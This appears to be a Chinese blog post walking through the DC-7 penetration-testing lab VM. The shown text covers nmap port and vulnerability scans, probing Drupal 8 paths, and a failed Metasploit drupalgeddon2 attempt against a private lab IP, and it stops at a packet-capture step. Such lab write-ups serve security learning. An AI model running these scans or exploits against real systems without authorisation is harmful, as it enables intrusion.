

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#FFD8F2">
  <meta name="author" content="Sweety">
  <meta name="keywords" content="">
  
    <meta name="description" content="DC-7IP扫描通过开关靶机对比nmap扫描结果得到： 记得将攻击主机和目标靶机置于同一种网络模式下 开靶机前：  开靶机后：  可以得到目标靶机的IP地址：192.168.204.136 端口扫描tcp、nmap、服务扫描123nmap -sT -p- 192.168.204.136nmap -sN -p- 192.168.204.136nmap -sV -p- 192.168.204.136">
<meta property="og:type" content="article">
<meta property="og:title" content="DC-7">
<meta property="og:url" content="https://haoisbinlove.github.io/2024/07/30/DC-7/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="DC-7IP扫描通过开关靶机对比nmap扫描结果得到： 记得将攻击主机和目标靶机置于同一种网络模式下 开靶机前：  开靶机后：  可以得到目标靶机的IP地址：192.168.204.136 端口扫描tcp、nmap、服务扫描123nmap -sT -p- 192.168.204.136nmap -sN -p- 192.168.204.136nmap -sV -p- 192.168.204.136">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721917100411.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721917123305.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721917269117.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721917348933.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721917572470.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721919457522.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721919498472.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721919511216.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721919720170.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721920133750.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721920512004.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721920483152.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721920548271.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721920724337.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721920693292.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721921400079.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721921379143.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721921554774.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721921619643.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721921885749.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721978418020.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721978552370.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721978616197.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721978973726.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721978991720.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721979099041.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721979559988.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721979915603.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721980846000.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721980955536.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721982451326.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721982622019.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721982882990.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721983651021.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721983736766.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721983815703.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721983847338.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721991581789.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721991661140.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721991869898.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721992090749.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721992165793.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721992327583.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721992484900.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721992472967.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721992957913.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721993115456.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721993415979.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721993729714.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721993959343.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721994182667.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721994385247.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721994686896.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721995081467.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721995160390.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721995287152.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721995312041.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721995866099.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721995952245.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721996262841.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722004424388.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722005001057.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722005189250.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722084389560.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722084587047.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722084234331.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722084968257.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722085979531.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722086362763.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722087300866.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722087351360.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722087443573.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722087601508.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722087651737.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722087719295.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722087831235.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722087887054.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722087999896.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722088047212.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722088082600.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722088121510.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722088257803.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722088339240.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722088475791.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722088595614.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722091222475.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722091249617.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722091441795.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722091421612.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722092334695.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722092909249.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722093747595.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722093843445.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722094500045.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722094610411.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722094858294.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722094992931.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722095478559.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722096051733.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722096152218.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1722096165290.png">
<meta property="article:published_time" content="2024-07-30T14:03:30.000Z">
<meta property="article:modified_time" content="2024-07-30T14:17:37.107Z">
<meta property="article:author" content="Sweety">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721917100411.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>DC-7 - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"haoisbinlove.github.io","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Sweety Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/24.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.08)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="DC-7"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-07-30 22:03" pubdate>
          2024年7月30日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          6.5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          55 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">DC-7</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="DC-7"><a href="#DC-7" class="headerlink" title="DC-7"></a>DC-7</h1><h2 id="IP扫描"><a href="#IP扫描" class="headerlink" title="IP扫描"></a>IP扫描</h2><p>通过开关靶机对比nmap扫描结果得到：</p>
<p>记得将攻击主机和目标靶机置于同一种网络模式下</p>
<p>开靶机前：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721917100411.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>开靶机后：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721917123305.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以得到目标靶机的IP地址：<code>192.168.204.136</code></p>
<h2 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h2><h3 id="tcp、nmap、服务扫描"><a href="#tcp、nmap、服务扫描" class="headerlink" title="tcp、nmap、服务扫描"></a>tcp、nmap、服务扫描</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">nmap -sT -p- 192.168.204.136<br>nmap -sN -p- 192.168.204.136<br>nmap -sV -p- 192.168.204.136<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721917269117.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721917348933.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>可以看到，开放的端口有：<code>22</code>、<code>80</code>，分别对应ssh远程连接服务和http网页服务。</p>
<h3 id="端口详细扫描"><a href="#端口详细扫描" class="headerlink" title="端口详细扫描"></a>端口详细扫描</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nmap -sT -sV -sC -O -p 22,80 192.168.204.136<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721917572470.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>从中得知一些信息，22端口的ssh服务版本号。</p>
<p>80端口应该对应存在着一个网站，网站使用的框架是CMS Drupal（version 8），还有一些不被允许访问的目录文件：</p>
<blockquote>
<p>&#x2F;core&#x2F;、&#x2F;profiles&#x2F;、&#x2F;README.txt、&#x2F;web.config、&#x2F;admin&#x2F;、&#x2F;comment&#x2F;reply&#x2F;、 &#x2F;filter&#x2F;tips 、&#x2F;node&#x2F;add&#x2F; 、&#x2F;search&#x2F;、&#x2F;user&#x2F;register&#x2F;、&#x2F;user&#x2F;password&#x2F; 、&#x2F;user&#x2F;login&#x2F; 、&#x2F;user&#x2F;logout&#x2F;、&#x2F;index.php&#x2F;admin&#x2F; 、&#x2F;index.php&#x2F;comment&#x2F;reply&#x2F;</p>
</blockquote>
<p>根据名字可以做一个简要的判断，admin、password、login这些文件可能会有我们Getshell所需要的信息。</p>
<h2 id="nmap漏扫"><a href="#nmap漏扫" class="headerlink" title="nmap漏扫"></a>nmap漏扫</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nmap -script=vuln -p 22,80 192.168.204.136<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721919457522.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721919498472.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721919511216.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>发现很多页面都可能存在csrf漏洞。但是csrf（跨站请求伪造）漏洞不好利用，需要抓取数据包伪造请求。</p>
<h2 id="网页信息检索"><a href="#网页信息检索" class="headerlink" title="网页信息检索"></a>网页信息检索</h2><p>首先访问目标网站<code>192.168.204.136</code>：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721919720170.png" srcset="/img/loading.gif" lazyload></p>
<p>发现网站首页有提示信息：</p>
<blockquote>
<p>DC-7 introduces some “new” concepts, but I’ll leave you to figure out what they are. </p>
<p>While this challenge isn’t all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won’t succeed.</p>
<p>What you will have to do, is to think “outside” the box.</p>
<p>Way “outside” the box. </p>
<p>这里提示了，dc-7引入了一些新的概念，想利用爆破或者字典攻击，大概率不会成功。所以我们需要做的就是跳出思维定势，远远跳出思维定势。</p>
</blockquote>
<p>而且我们发现目标网站显示出来的网页并没有可以登陆的地方，只有一个搜索框“Search”，尝试在搜索框输入一些信息。比如输入指令<code>ls</code>，会发现它竟然要我们输入密码，这里的密码暂时不知道是不是用于用户身份验证的唯一密码还是对应搜索对象的访问密码。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721920133750.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>还记得我们上面通过nmap端口扫描得到的那些目录吗？尝试访问，看看能不能获取什么有效的信息。</p>
<blockquote>
<p>&#x2F;core&#x2F;、&#x2F;profiles&#x2F;、&#x2F;README.txt、&#x2F;web.config、&#x2F;admin&#x2F;、&#x2F;comment&#x2F;reply&#x2F;、 &#x2F;filter&#x2F;tips 、&#x2F;node&#x2F;add&#x2F; 、&#x2F;search&#x2F;、&#x2F;user&#x2F;register&#x2F;、&#x2F;user&#x2F;password&#x2F; 、&#x2F;user&#x2F;login&#x2F; 、&#x2F;user&#x2F;logout&#x2F;、&#x2F;index.php&#x2F;admin&#x2F; 、&#x2F;index.php&#x2F;comment&#x2F;reply&#x2F;</p>
</blockquote>
<p>访问上述的所有目录文件，大部分都没有返回什么有用的信息，不是由于权限不足被拒绝访问，就是发生了4XX系列的错误。</p>
<p>唯一有用的是找到了需要输入用户名和密码的登陆界面以及一个密码输入界面。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721920512004.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721920483152.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721920548271.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>① <a target="_blank" rel="noopener" href="http://192.168.204.136/user/password/">http://192.168.204.136/user/password/</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721920724337.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>② <a target="_blank" rel="noopener" href="http://192.168.204.136/user/login/">http://192.168.204.136/user/login/</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721920693292.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="漏洞查找"><a href="#漏洞查找" class="headerlink" title="漏洞查找"></a>漏洞查找</h2><p>使用Metasploit查找有关Drupal的漏洞，前面进行nmap端口扫描的时候我们还知道Drupal的版本号是8，可以添加条件更加精确地找到相关漏洞。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">search Drupal<br>search Drupal 8<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721921400079.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721921379143.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>尝试利用最新的那个高危漏洞<code> exploit/unix/webapp/drupal_drupalgeddon2</code>，并查看其参数。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">use exploit/unix/webapp/drupal_drupalgeddon2<br>show options<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721921554774.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>修改可修改的<code>RHOSTS</code>参数值为目标靶机的IP地址，并查看其修改是否成功。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">set</span> RHOSTS 192.168.204.136<br>show options<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721921619643.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>尝试，是否能成功应用修改。执行<code>run/exploit</code>命令。</p>
<p>发现，报了<code>Unexpected reply</code>未期望的应答错误，而且最后也没有成功创建session，漏洞利用失败。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721921885749.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>当然，也可以尝试那个久一点的漏洞，但是很大概率会失败，要是真给你成功了，还说啥远远跳出惯性思维（&#x2F;doge）</p>
<h2 id="用户账户查找"><a href="#用户账户查找" class="headerlink" title="用户账户查找"></a>用户账户查找</h2><h3 id="数据包搜寻"><a href="#数据包搜寻" class="headerlink" title="数据包搜寻"></a>数据包搜寻</h3><p>对目标网站的关键网页进行抓包，尝试输入命令，看看抓取的数据包的内容组成。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/QQ_1721978418020.png" srcset="/img/loading.gif" lazyload alt="img"></p>
